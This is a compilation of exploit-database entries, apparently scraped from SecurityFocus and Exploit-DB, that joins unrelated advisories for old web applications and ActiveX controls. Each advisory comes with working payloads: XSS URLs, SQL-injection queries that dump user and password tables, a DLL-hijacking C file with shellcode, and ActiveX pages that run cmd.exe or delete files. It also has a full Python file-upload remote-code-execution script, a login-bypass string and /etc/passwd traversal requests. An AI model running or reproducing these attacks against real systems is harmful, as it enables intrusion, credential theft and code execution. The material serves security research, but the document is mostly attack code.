Mambo CMS 4.6.5 is vulnerable; other versions may also be affected;
http://www.example.com/mambo/index.php?option=com_content&task=%22%20style=width:1000px;height:1000px;top:0;left:0;position:absolute%20onmouseover=alert%28/XSS/%29%20&id=3&Itemid=32
http://www.example.com/mambo/administrator/index2.php?option=com_menumanager&task=edit&hidemainmenu=1&menu=Move+your+mouse+here%22%20style=position:absolute;width:1000px;height:1000px;top:0;left:0;%20onmouseover=alert%28/XSS/%29%20
http://www.example.com/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS
http://www.example.com/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20%20%20style=background-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS
http://www.example.com/mambo/administrator/index2.php?limit=10&order%5b%5d=11&boxchecked=0&toggle=on&search=simple_search&task=&limitstart=0&cid%5b%5d=on&zorder=c.ordering+DESC"><script>alert(/XSS/)</script>&filter_authorid=62&hidemainmenu=0&option=com_typedcontent
http://www.example.com/mambo/administrator/index2.php?limit=10&boxchecked=0&toggle=on&search=xss"><script>alert(/XSS/)</script>&task=&limitstart=0&hidemainmenu=0&option=com_comment
http://www.example.com/mambo/administrator/index2.php?option=com_modules&client=%27%22%20onmouseover=alert%28/XSS/%29%20a=%22%27
http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2
http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20style%3d-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss)%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2
http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20%20style=background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2
http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;dis
http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2
source: https://www.securityfocus.com/bid/48452/info
The 'com_morfeoshow' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=1015+and+1=0+union+select+1,2,concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+
source: https://www.securityfocus.com/bid/48451/info
Nodesforum is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/?_nodesforum_node=u1'
/*
source: https://www.securityfocus.com/bid/48432/info
xAurora is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
*/
#include <windows.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]="\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"
"\x2e\x65\x78\x65\x00";
int xAuroraPwnage()
{
int *ret;
ret=(int *)&ret+2;
(*ret)=(int)shellcode;
MessageBox(0, "[+] xAurora Pwned By Zer0 Thunder !", "Not so Secured Browser", MB_OK);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
xAuroraPwnage();
return 0;
}
source: https://www.securityfocus.com/bid/48408/info
LEADTOOLS Imaging LEADSmtp ActiveX control is prone to a vulnerability caused by an insecure method.
Successfully exploiting this issue will allow attackers to create or overwrite files within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Attackers may execute arbitrary code with user-level privileges.
<html>
<object classid='clsid:0014085F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\Filename_to_overwrite"
arg2=True
target.SaveMessage arg1 ,arg2
End Sub
</script>
</html>
# Exploit Title: Remote Code Execution via Unauthorised File upload in Cforms 14.7
# Date: 2015-01-19
# Exploit Author: Zakhar
# Vendor Homepage: https://wordpress.org/plugins/cforms2/
# Software Link: https://downloads.wordpress.org/plugin/cforms2.zip
# Version: 14.7
# Tested on: Wordpress 4.0
# CVE : 2014-9473
import os
import requests
import re
import base64
import sys
from lxml import etree
from optparse import OptionParser
def main():
print 'Cforms II File Upload + Remote Code Execution\n'
text = 'Test text'
text_mail = 'test@mail.com'
parser = OptionParser()
parser.add_option("-f", "--file", dest="file", help="file to upload", default = "itest.php", metavar="FILE")
parser.add_option("-i", "--max-iterations", dest="iterations", help="Numbe of fields to iterate", default = "10")
parser.add_option("-b", "--upload-file-name-bruteforce", dest="brute", help="Uploaded file name brute force", default = "10")
parser.add_option("-n", "--cforms-form-number", dest="number", help="Cforms form number", default = "")
parser.add_option("-c", "--cforms-home-dir", dest="home", help="Cforms form home dir", default = "/wp-content/plugins/cforms2/")
parser.add_option("-u", "--url", dest="url", help="vulnerable url with contact form, example: http://127.0.0.1/Contact/")
(opt, args) = parser.parse_args()
options = opt.__dict__
if not opt.url: # if url is not given
parser.error('URL not given')
if not opt.file:
parser.error('file not given')
filename = options["file"]
if os.path.isfile(filename) is not True:
print 'No such file '+filename
return 0
url = options['url']
home = options["home"]
i = options["iterations"]
n = options["number"]
b = options["brute"]
s = requests.Session()
r = s.get(url)
if r.status_code != requests.codes.ok:
print 'Error: website not found.'
return 0
tree = etree.HTML(r.text)
# get cforms id
if n is "":
for x in xrange(2,10):
for node in tree.xpath('//*[@id="cforms'+str(x)+'form"]'):
if node is not None:
n = str(x)
break
print 'Cforms form number is <'+n+'>'
hidden = ['cf_working'+n,'cf_failure'+n,'cf_codeerr'+n,'cf_customerr'+n,'cf_popup'+n]
fields = ['cf'+n+'_field_'+str(x) for x in xrange(1,int(i)+1)]
required = {'sendbutton'+n:'1'}
for f in fields:
for node in tree.xpath('//*[@id="' + f + '"]'):
if node is not None:
if 'fldrequired' in node.get('class'):
if 'fldemail' in node.get('class'):
required[f] = text_mail
else:
required[f] = text
for h in hidden:
for node in tree.xpath('//*[@id="' + h + '"]'):
if node is not None:
required[h] = node.get('value')
for node in tree.xpath('//*[@id="cforms_captcha'+n+'"]'):
if node is not None:
print 'Error: Cforms uses captcha. Sorry, you have to exploit it manually.'
return 0
files = {'cf_uploadfile'+n+'[]':('wow.php',open(filename))}
r = s.post(url,data=required,files=files)
if r.status_code != requests.codes.ok:
print 'Error: post error.'
print r.status_code
return 0
else:
url1 = url + home + 'noid-wow.php'
flag = 0
if s.get(url1).status_code != requests.codes.ok:
for l in xrange(1,int(b)):
url1 = url + home + str(l) + '-wow.php'
print url1
if s.get(url1).status_code == requests.codes.ok:
flag = 1
break
else:
flag = 1
if flag == 1:
print "Succes! Uploaded file: " + url1
else:
print "Uploaded file not found. Try to increase -b flag or change upload dir. 14.6.3 version and above use wordpress upload folder"
main()
##################################################################################################
#Exploit Title : ecommercemajor ecommerce CMS SQL Injection and Authentication bypass
#Author : Manish Kishan Tanwar
#Home page Link : https://github.com/xlinkerz/ecommerceMajor
#Date : 22/01/2015
#Discovered at : IndiShell Lab
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti,Kishan Singh and ritu rathi
#email : manish.1046@gmail.com
##################################################################################################
////////////////////////
/// Overview:
////////////////////////
ecommercemajor is the php based CMS for ecommerce portal
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
SQL injection vulnerability:-
==============================
in file product.php data from GET parameter 'productbycat' is not getting filter before passing into SQL query and hence rising SQL Injection vulnerability
---------------------
$getallproduct="select * from purchase where status='enable' and catid=$_GET[productbycat] order by id desc";
---------------------
POC
http://127.0.0.1/ecommercemajor/product.php?productbycat=SQLI
Authentication Bypass:-
==============================
file index.php under directory __admin has SQL injection vulnerability
parameter username and password suppliedin post parameter for checking valid admin username and password is not getting filter before passing into SQL query which arise authentication bypass issue.
vulnerable code is
-------------------
if(isset($_POST[login]))
{
$check="select * from adminlogin where username='$_POST[username]' and password='$_POST[username]'";
$checkresult=mysql_query($check);
$checkcount=mysql_num_rows($checkresult);
if($checkcount>0)
{
$checkrow=mysql_fetch_array($checkresult);
$_SESSION[adminname]=$checkrow[adminname];
$_SESSION[adminloginstatus]="success";
echo "<script>window.location='home.php';</script>";
}
--------------------
POC
open admin panel
http://127.0.0.1/ecommercemajor/__admin/
username: ' or '1337'='1337
password: ' or '1337'='1337
--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das
#############################################################################################
--==[[Love to]]==--
#Kishan Tanwar,Mrs. Ritu Rathi,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)
--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3
source: https://www.securityfocus.com/bid/48399/info
Sitemagic CMS is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain arbitrary local files in the context of the webserver process.
http://www.example.com/smcmsdemoint/index.php?SMTpl=../../../../../../../../../../etc/passwd%00.png
source: https://www.securityfocus.com/bid/48393/info
Easewe FTP OCX ActiveX control is prone to multiple insecure-method vulnerabilities.
Attackers can exploit these issues to perform unauthorized actions or execute arbitrary programs. Successful exploits may result in compromise of affected computers.
Easewe FTP OCX ActiveX control 4.5.0.9 is vulnerable; other versions may also be affected.
1.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="c:\windows\system32\cmd.exe"
arg2=""
arg3=1
target.Execute arg1 ,arg2 ,arg3
End Sub
</script>
</html>
2.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="c:\windows\system32\cmd.exe"
arg2=""
arg3=1
target.Run arg1 ,arg2 ,arg3
End Sub
</script>
</html>
3.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\Filename_to_create"
target.CreateLocalFile arg1
End Sub
</script>
</html>
4.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="Directorypath\Directory"
target.CreateLocalFolder arg1
End Sub
</script>
</html>
5.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\Filename_to_delete"
target.DeleteLocalFile arg1
End Sub
</script>
</html>
<HTML>
Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit<br>
<br>
Description There is Insecure Method in (LocalFileCreate) fonction<br>
Found By : coolkaveh<br>
<title>Exploited By : coolkaveh </title>
<BODY>
<object id=cyber
classid="clsid:{31AE647D-11D1-4E6A-BE2D-90157640019A}"></object>
<SCRIPT>
function Do_it()
{
File = "kaveh.txt"
cyber.LocalFileCreate(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Click
here To Test"><br>
</body>
</HTML>
source: https://www.securityfocus.com/bid/48392/info
FanUpdate is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
FanUpdate 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/header.php?pageTitle=%3C/title%3E%3Cscript%3Ealert%28123%29;%3C/script%3E
source: https://www.securityfocus.com/bid/48391/info
Eshop Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/path/catalogue.php?id_shop=7[SQLI]
http://www.example.com/path/article.php?id_article=7[SQLI]
http://www.example.com/path/banniere.php?id_article=7[SQLI]
http://www.example.com/path/detail_news.php?id_article=7[SQLI]
http://www.example.com/path/detail_produit.php?id_shop=3&ref=200308G[SQLI]
source: https://www.securityfocus.com/bid/48217/info
Tolinet Agencia is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/index.php?tip=art&id=2' <- blind sql
source: https://www.securityfocus.com/bid/48389/info
Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer-dereference error.
An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition.
Wireshark 1.4.5 is vulnerable.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35873.pcap
source: https://www.securityfocus.com/bid/48215/info
The Pacer Edition CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The Pacer Edition CMS RC 2.1 is vulnerable; prior versions may also be affected.
<html>
<title>Pacer Edition CMS 2.1 Remote XSS POST Injection Vulnerability</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">function xss1(){document.forms["xss"].submit();}</script>
<form action="http://www.example.com/admin/login/forgot/index.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
<input type="hidden" name="url" value="1" />
<input type="hidden" name="email" value='%F6"+onmouseover=prompt(31337)' />
<input type="hidden" name="button" value="Send%20Details" />
</form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><center><h3><br /><br />Exploit!<h3></center></font></b></a>
</body>
</html>
source: https://www.securityfocus.com/bid/48167/info
The Perl Data::FormValidator module is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and obtain potentially sensitive information.
Data::FormValidator 4.66 is vulnerable; other versions may also be affected.
#!/opt/perl/5.12/bin/perl
use strict;
use warnings;
use Data::FormValidator;
"some_unrelated_string" =~ m/^.*$/;
my $profile = {
untaint_all_constraints => 1,
required => [qw(a)],
constraint_methods => {
a => qr/will_never_match/,
},
};
my $results = Data::FormValidator->check({ a => 1 }, $profile);
warn $results->valid('a');
source: https://www.securityfocus.com/bid/48166/info
The GD Star Rating plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/gd-star-rating/ajax.php?_wpnonce=<insert_valid_nonce>&vote_type=cache&vote_domain=a&votes=asr.1.xxx.1.2.5+limit+0+union+select+1,0x535242,1,1,co
ncat(0x613a313a7b733a363a226e6f726d616c223b733a323030303a22,substring(concat((select+concat(user_nicename,0x3a,user_email,0x3a,user_login,0x3a,user_pass)+from+wp_users+where+length(user_pass)%3E0+order+by+id+limit+0,1),repeat(0x20,2000)),1,2000),0x223b7d),1,1,1+limit+1
source: https://www.securityfocus.com/bid/48132/info
BLOG:CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
BLOG:CMS 4.2.1.f is vulnerable; other versions may also be affected.
http://www.example.com/blogcms/photo/index.php?"<script>alert(0x0029A)</script>
http://www.example.com/blogcms/photo/index.php?"<script>alert('XSS');</script>
http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert('XSS');</script>
http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert(0x0029A)</script>
http://www.example.com/blogcms/admin/plugins/mailtoafriend/mailfriend.php
source: https://www.securityfocus.com/bid/48126/info
Xataface is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
NOTE (July 4, 2011): The vendor indicates that this issue affects versions prior to Xataface 1.2.6, while the reporter indicates 1.3rc1 and 1.3rc2 are affected.
http://www.example.com/index.php?-action=../../../../../../etc/passwd%00